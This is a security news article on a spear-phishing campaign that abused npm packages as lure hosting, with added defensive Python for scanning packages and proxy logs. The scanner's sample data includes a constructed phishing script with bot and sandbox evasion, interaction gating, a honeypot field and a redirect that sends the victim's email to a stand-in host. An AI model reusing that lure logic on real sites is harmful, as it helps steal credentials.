27 Malicious npm Packages Leveraged as Phishing Infrastructure to Steal Credentials
Cybersecurity researchers have outlined a “sustained and targeted” spear-phishing operation that weaponized more than two dozen npm packages to support credential theft, effectively turning the registry into phishing infrastructure.
The campaign, which uploaded 27 npm packages under six distinct npm publisher aliases, has largely focused on sales and commercial staff working for organizations adjacent to critical infrastructure in the U.S. and allied countries, according to Socket.
“Over a five-month window, the threat actors converted 27 npm packages into stable hosting for browser-delivered lures that imitate document-sharing portals and Microsoft sign-in, targeting 25 organizations across manufacturing, industrial automation, plastics, and healthcare to steal credentials,” researchers Nicholas Anderson and Kirill Boychenko said.
The package names are as follows –
Instead of relying on users installing these packages, the attackers’ primary objective is to abuse npm and package content delivery networks (CDNs) as a hosting layer. From there, they serve client-side HTML and JavaScript lures that masquerade as secure document-sharing flows, embedded directly into phishing pages. Victims are then forwarded to Microsoft sign-in pages where their email address is already populated in the login form.
Hosting the lures on package CDNs gives the operators several evasion advantages, most notably the ability to hide behind a legitimate software distribution service that is harder to take down quickly. It also lets them pivot rapidly to new publisher aliases and package names, even after individual packages are removed.
The packages implement several client-side checks specifically designed to frustrate analysis and automated detection, such as filtering out bots, avoiding execution in sandboxed environments, and requiring mouse or touch interaction before redirecting users to attacker-controlled credential harvesting endpoints. The JavaScript is additionally obfuscated or heavily minified to hinder automated static inspection.
Another significant anti-analysis technique used by the threat actor is the introduction of honeypot form fields that remain invisible to real users but are likely to be filled in by automated crawlers. Population of these fields serves as a secondary gate, blocking the attack flow from progressing further under analysis conditions.
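The anti-analysis features described above (bot and sandbox checks, interaction gating, honeypot fields, a hard-coded recipient address, and minified scripts) are all static artifacts that a registry-side or pre-install scan can look for. The following added example, not code from Socket or from any of the packages named here, runs a set of such heuristics over a constructed in-memory package; the file names, markup, script and e-mail address in the sample are invented for the example.

```python
import re

# Constructed sample of a lure-hosting package (invented, not from the campaign).
SAMPLE_PACKAGE = {
    "package.json": '{"name": "docs-example", "version": "1.0.0", "main": "index.js"}',
    "index.js": "module.exports = {};",  # the module itself does nothing
    "dist/lure.html": (
        "<html><body><h1>A document was shared with you</h1>"
        "<form id='f'><input name='email' value='alice@example.test'>"
        "<div style='display:none'><input name='website' id='hp'></div>"  # honeypot
        "<button>Open OneDrive document</button></form>"
        "<script src='app.min.js'></script></body></html>"
    ),
    "dist/app.min.js": (
        "var ok=false;if(navigator.webdriver||/headless|crawler/i.test(navigator.userAgent)){document.body.innerHTML=''}"
        "document.addEventListener('mousemove',function(){ok=true});document.addEventListener('touchstart',function(){ok=true});"
        "document.getElementById('f').onsubmit=function(e){e.preventDefault();if(!ok||document.getElementById('hp').value){return}"
        "window.location.href='https://placeholder.example.invalid/?login_hint='+encodeURIComponent(document.forms[0].email.value)}"
    ),
}

# Each heuristic: (indicator name, regex). A hit on its own is weak; several
# together on a package that exports no real code is the pattern the article describes.
HEURISTICS = [
    ("html_bundle", re.compile(r"<html|<form|<input", re.I)),
    ("microsoft_signin_lure", re.compile(r"microsoftonline|onedrive|sharepoint|\bsign[ -]?in\b", re.I)),
    ("bot_or_sandbox_check", re.compile(r"navigator\.webdriver|headless|crawler|\bbot\b", re.I)),
    ("interaction_gate", re.compile(r"addEventListener\(\s*['\"](mousemove|touchstart|click)", re.I)),
    ("honeypot_field", re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0)[^>]*>\s*<input", re.I)),
    ("client_side_redirect", re.compile(r"location\.href\s*=|location\.replace\(|window\.location\s*=", re.I)),
]
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def scan_package(files):
    """Return indicators found, hard-coded e-mail addresses, and a simple score."""
    hits, emails = {}, set()
    for path, content in files.items():
        if not path.endswith((".html", ".htm", ".js")):
            continue
        for name, pattern in HEURISTICS:
            if pattern.search(content):
                hits.setdefault(name, []).append(path)
        emails.update(EMAIL_RE.findall(content))
        lines = content.splitlines() or [content]
        # Very long average line length is a cheap minification signal.
        if path.endswith(".js") and sum(map(len, lines)) / len(lines) > 200:
            hits.setdefault("minified_js", []).append(path)
    return {"indicators": hits, "hardcoded_emails": sorted(emails), "score": len(hits)}
```

The score is the number of distinct indicator families that fired; a threshold of three or more is a reasonable starting point for routing a package to manual review.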
Socket noted that the domains bundled within these packages intersect with adversary-in-the-middle (AitM) phishing infrastructure tied to Evilginx, an open-source phishing framework.
This is not the first time npm has been repurposed as a delivery layer for phishing. In October 2025, a software supply chain security vendor documented a campaign named Beamglea, in which unknown actors uploaded 175 malicious packages for credential theft. The current activity is assessed as a separate cluster from Beamglea, despite some conceptual similarities.
“This campaign follows a similar overall pattern but uses different delivery mechanics,” Socket said. “Rather than shipping small redirect scripts, these packages contain a full, browser-executed phishing workflow as an embedded HTML and JavaScript bundle that runs whenever it is loaded into a page context.”
In addition, the phishing packages hard-code 25 email addresses belonging to specific individuals working as account managers, sales representatives, and business development staff within manufacturing, industrial automation, plastics and polymer supply chains, and healthcare organizations across Austria, Belgium, Canada, France, Germany, Italy, Portugal, Spain, Sweden, Taiwan, Turkey, the U.K., and the U.S.
The exact source of these email addresses remains unclear. However, because many of the impacted companies participate in large international trade fairs such as Interpack and K-Fair, it is suspected that the threat actors may have scraped contact information from those event sites and enriched it with broad open-source reconnaissance.
“In several instances, the victim’s location does not match the company’s headquarters, which aligns with the actor’s emphasis on regional sales teams, country-level managers, and local commercial staff rather than central IT,” the company said.
From a defensive perspective, organizations should treat this as another supply-chain-adjacent phishing vector. Recommended controls include strict verification of third-party and transitive dependencies, logging and reviewing anomalous CDN requests originating from non-development environments, enforcing phishing-resistant multi-factor authentication (MFA), and monitoring for high-risk post-authentication behavior.
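One of the controls listed above, reviewing package-CDN requests from non-development hosts, can be turned into a simple proxy-log rule. The following is an added example, not Socket's tooling: it assumes a constructed log format, an invented set of development hosts, and a set of well-known public npm CDN hostnames (the article does not say which CDNs the campaign used, so adjust the set to your environment).

```python
import re
from urllib.parse import urlparse

# Assumption: common public npm CDNs / registry; extend for your environment.
PACKAGE_CDN_HOSTS = {"cdn.jsdelivr.net", "unpkg.com", "registry.npmjs.org"}
# Assumption: hosts that legitimately pull packages (build agents, developer workstations).
DEV_HOSTS = {"build-01", "dev-wks-42"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) method=(?P<method>\S+) "
    r"url=(?P<url>\S+) status=(?P<status>\d+)"
)

# Constructed proxy log sample; hosts, users and the package name are invented.
SAMPLE_LOG = """\
2025-11-03T09:14:22Z src=build-01 user=ci method=GET url=https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz status=200
2025-11-03T10:02:05Z src=wks-sales-17 user=jdoe method=GET url=https://cdn.jsdelivr.net/npm/example-docs-app@1.0.2/dist/index.html status=200
2025-11-03T10:02:06Z src=wks-sales-17 user=jdoe method=GET url=https://cdn.jsdelivr.net/npm/example-docs-app@1.0.2/dist/app.min.js status=200
2025-11-03T10:03:40Z src=wks-sales-17 user=jdoe method=GET url=https://www.example.com/ status=200
2025-11-03T11:20:11Z src=dev-wks-42 user=mlee method=GET url=https://unpkg.com/react@18/umd/react.production.min.js status=200
"""

def detect_cdn_lure_requests(log_text, dev_hosts=DEV_HOSTS):
    """Flag package-CDN fetches from hosts that have no business installing packages.

    An HTML document pulled from a package CDN is escalated: libraries are .js/.tgz,
    a browser-rendered page from the registry is the lure pattern the article describes.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than fail the whole batch
        url = urlparse(m["url"])
        if url.hostname not in PACKAGE_CDN_HOSTS or m["src"] in dev_hosts:
            continue
        reasons = ["package CDN request from non-development host"]
        if url.path.lower().endswith((".html", ".htm")):
            reasons.append("HTML document fetched from package CDN (browser-delivered lure, not a library)")
        alerts.append({
            "ts": m["ts"], "src": m["src"], "user": m["user"], "url": m["url"],
            "severity": "high" if len(reasons) > 1 else "medium", "reasons": reasons,
        })
    return alerts
```

A high-severity hit is worth correlating with any sign-in event for the same user in the following minutes, since the lure's next step is a credential prompt.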
Socket also reported a consistent increase in destructive malware distributed through npm, PyPI, NuGet Gallery, and Go module indexes, often using delayed execution and remotely controlled kill switches to bypass early detection and retrieve executable payloads at runtime via standard tools like wget and curl.
“Instead of encrypting entire disks or wiping files indiscriminately, these packages generally act in a more targeted way,” researcher Kush Pandya said.
“They focus on what matters most to developers: Git repositories, source trees, configuration artifacts, and CI build outputs. The destructive logic is often embedded within otherwise legitimate code paths and triggered via standard lifecycle hooks, so the malware can execute without ever being directly imported or called by the application.”